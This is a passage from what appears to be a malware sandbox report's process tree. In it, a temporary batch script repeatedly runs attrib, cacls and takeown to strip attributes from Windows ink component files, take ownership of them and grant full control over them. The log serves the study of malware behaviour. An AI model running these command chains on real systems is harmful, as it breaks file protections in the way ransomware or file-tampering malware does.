- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipscht.xml" /E /G Admin:F /C
    3⤵
    PID:1772
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipscht.xml"
    3⤵
    PID:1956
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipscsy.xml""
  2⤵
  PID:888
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipscsy.xml"
    3⤵
    - Views/modifies file attributes
    PID:1896
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipscsy.xml" /E /G Admin:F /C
    3⤵
    PID:1832
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipscsy.xml"
    3⤵
    PID:1916
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsdan.xml""
  2⤵
  PID:1400
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsdan.xml"
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsdan.xml" /E /G Admin:F /C
    3⤵
    PID:1652
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsdan.xml"
    3⤵
    PID:1576
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsdeu.xml""
  2⤵
  PID:1388
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsdeu.xml"
    3⤵
    PID:760
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsdeu.xml" /E /G Admin:F /C
    3⤵
    PID:1612
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsdeu.xml"
    3⤵
    PID:1648
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsen.xml""
  2⤵
  PID:1464
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsen.xml"
    3⤵
    PID:2008
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsen.xml" /E /G Admin:F /C
    3⤵
    PID:1036
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsen.xml"
    3⤵
    PID:1044
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsesp.xml""
  2⤵
  PID:1668
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsesp.xml"
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsesp.xml" /E /G Admin:F /C
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsesp.xml"
    3⤵
    PID:1920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsfin.xml""
  2⤵
  PID:1844
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsfin.xml"
    3⤵
    PID:1628
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsfin.xml" /E /G Admin:F /C
    3⤵
    PID:744
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsfin.xml"
    3⤵
    - Modifies file permissions
    PID:1632
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsfra.xml""
  2⤵
  PID:1904
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsfra.xml"
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsfra.xml" /E /G Admin:F /C
    3⤵
    PID:108
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsfra.xml"
    3⤵
    PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipshrv.xml""
  2⤵
  PID:1624
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipshrv.xml"
    3⤵
    - Views/modifies file attributes
    PID:1872
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipshrv.xml" /E /G Admin:F /C
    3⤵
    PID:1820
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipshrv.xml"
    3⤵
    PID:112
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsita.xml""
  2⤵
  PID:1992
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsita.xml"
    3⤵
    PID:1988
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsita.xml" /E /G Admin:F /C
    3⤵
    PID:1980
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsita.xml"
    3⤵
    PID:2004
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsjpn.xml""
  2⤵
  PID:1108
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsjpn.xml"
    3⤵
    - Views/modifies file attributes
    PID:1512
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsjpn.xml" /E /G Admin:F /C
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsjpn.xml"
    3⤵
    PID:668
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipskor.xml""
  2⤵
  PID:1100
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipskor.xml"
    3⤵
    PID:1996
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipskor.xml" /E /G Admin:F /C
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipskor.xml"
    3⤵
    PID:760
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsnld.xml""
  2⤵
  PID:1612
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsnld.xml"
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsnld.xml" /E /G Admin:F /C
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsnld.xml"
    3⤵
    PID:2008
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsnor.xml""
  2⤵
  PID:1036
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsnor.xml"
    3⤵
    PID:1464
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsnor.xml" /E /G Admin:F /C
    3⤵
    PID:1584
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsnor.xml"
    3⤵
    PID:2020
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsplk.xml""
  2⤵
  PID:1056
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsplk.xml"
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsplk.xml" /E /G Admin:F /C
    3⤵
    PID:240
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsplk.xml"
    3⤵
    PID:1960
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsptb.xml""
  2⤵
  PID:1892
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsptb.xml"
    3⤵
    PID:1788
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsptb.xml" /E /G Admin:F /C
    3⤵
    PID:1804
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsptb.xml"
    3⤵
    PID:1848
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsptg.xml""
  2⤵
  PID:112
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsptg.xml"
    3⤵
    PID:844
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsptg.xml" /E /G Admin:F /C
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsptg.xml"
    3⤵
    PID:1832
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsrom.xml""
  2⤵
  PID:2016
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsrom.xml"
    3⤵
    PID:2036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsrom.xml" /E /G Admin:F /C
    3⤵
    PID:268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsrom.xml"
    3⤵
    PID:668
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipsrus.xml""
  2⤵
  PID:2012
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipsrus.xml"
    3⤵
    - Views/modifies file attributes
    PID:1048
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipsrus.xml" /E /G Admin:F /C
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipsrus.xml"
    3⤵
    PID:1400
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipssrb.xml""
  2⤵
  PID:1576
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipssrb.xml"
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipssrb.xml" /E /G Admin:F /C
    3⤵
    PID:1124
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipssrb.xml"
    3⤵
    PID:1924
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipssrl.xml""
  2⤵
  PID:1908
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipssrl.xml"
    3⤵
    PID:1068
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipssrl.xml" /E /G Admin:F /C
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipssrl.xml"
    3⤵
    PID:1192
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ipssve.xml""
  2⤵
  PID:1036
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ipssve.xml"
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ipssve.xml" /E /G Admin:F /C
    3⤵
    PID:744
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ipssve.xml"
    3⤵
    - Modifies file permissions
    PID:1668
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\tipresx.dll.mui""
  2⤵
  PID:612
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\tipresx.dll.mui"
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:812
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\tipresx.dll.mui"
    3⤵
    PID:1848
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\tipresx.dll.mui""
  2⤵
  PID:1564
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\tipresx.dll.mui"
    3⤵
    PID:1980
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\tipresx.dll.mui"
    3⤵
    PID:2004
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ko-KR\tipresx.dll.mui""
  2⤵
  PID:1544
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ko-KR\tipresx.dll.mui"
    3⤵
    PID:2036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ko-KR\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ko-KR\tipresx.dll.mui"
    3⤵
    PID:888
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\tipresx.dll.mui""
  2⤵
  PID:2016
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\tipresx.dll.mui"
    3⤵
    - Views/modifies file attributes
    PID:1048
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:760
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\tipresx.dll.mui"
    3⤵
    PID:1900
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\lv-LV\tipresx.dll.mui""
  2⤵
  PID:2012
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\lv-LV\tipresx.dll.mui"
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\lv-LV\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\lv-LV\tipresx.dll.mui"
    3⤵
    - Modifies file permissions
    PID:1684
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO\tipresx.dll.mui""
  2⤵
  PID:1576
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO\tipresx.dll.mui"
    3⤵
    PID:1068
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO\tipresx.dll.mui"
    3⤵
    PID:884
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\tipresx.dll.mui""
  2⤵
  PID:1908
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\tipresx.dll.mui"
    3⤵
    PID:240
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1776
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\tipresx.dll.mui"
    3⤵
    PID:872
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL\tipresx.dll.mui""
  2⤵
  PID:568
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL\tipresx.dll.mui"
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1872
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL\tipresx.dll.mui"
    3⤵
    PID:1768
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\pt-BR\tipresx.dll.mui""
  2⤵
  PID:612
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\pt-BR\tipresx.dll.mui"
    3⤵
    PID:1220
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\pt-BR\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\pt-BR\tipresx.dll.mui"
    3⤵
    PID:2004
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\pt-PT\tipresx.dll.mui""
  2⤵
  PID:1988
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\pt-PT\tipresx.dll.mui"
    3⤵
    PID:1852
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\pt-PT\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\pt-PT\tipresx.dll.mui"
    3⤵
    PID:888
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ro-RO\tipresx.dll.mui""
  2⤵
  PID:536
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ro-RO\tipresx.dll.mui"
    3⤵
    PID:1100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ro-RO\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:760
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ro-RO\tipresx.dll.mui"
    3⤵
    - Modifies file permissions
    PID:1900
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\ru-RU\tipresx.dll.mui""
  2⤵
  PID:1696
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\ru-RU\tipresx.dll.mui"
    3⤵
    PID:1612
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\ru-RU\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\ru-RU\tipresx.dll.mui"
    3⤵
    PID:1684
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\sk-SK\tipresx.dll.mui""
  2⤵
  PID:1276
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\sk-SK\tipresx.dll.mui"
    3⤵
    - Views/modifies file attributes
    PID:748
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\sk-SK\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\sk-SK\tipresx.dll.mui"
    3⤵
    PID:884
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI\tipresx.dll.mui""
  2⤵
  PID:524
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI\tipresx.dll.mui"
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1776
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI\tipresx.dll.mui"
    3⤵
    PID:872
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\sr-Latn-CS\tipresx.dll.mui""
  2⤵
  PID:1856
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\sr-Latn-CS\tipresx.dll.mui"
    3⤵
    PID:1632
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\sr-Latn-CS\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1872
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\sr-Latn-CS\tipresx.dll.mui"
    3⤵
    PID:1768
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\sv-SE\tipresx.dll.mui""
  2⤵
  PID:1804
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\sv-SE\tipresx.dll.mui"
    3⤵
    PID:112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\sv-SE\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\sv-SE\tipresx.dll.mui"
    3⤵
    PID:2004
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\th-TH\tipresx.dll.mui""
  2⤵
  PID:1620
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\th-TH\tipresx.dll.mui"
    3⤵
    PID:668
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\th-TH\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\ink\th-TH\tipresx.dll.mui"
    3⤵
    PID:888
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\ink\tr-TR\tipresx.dll.mui""
  2⤵
  PID:1964
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\ink\tr-TR\tipresx.dll.mui"
    3⤵
    PID:1400
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\ink\tr-TR\tipresx.dll.mui" /E /G Admin:F /C
    3⤵
    PID:760
- - C:\Windows\SysWOW64\takeown.exe
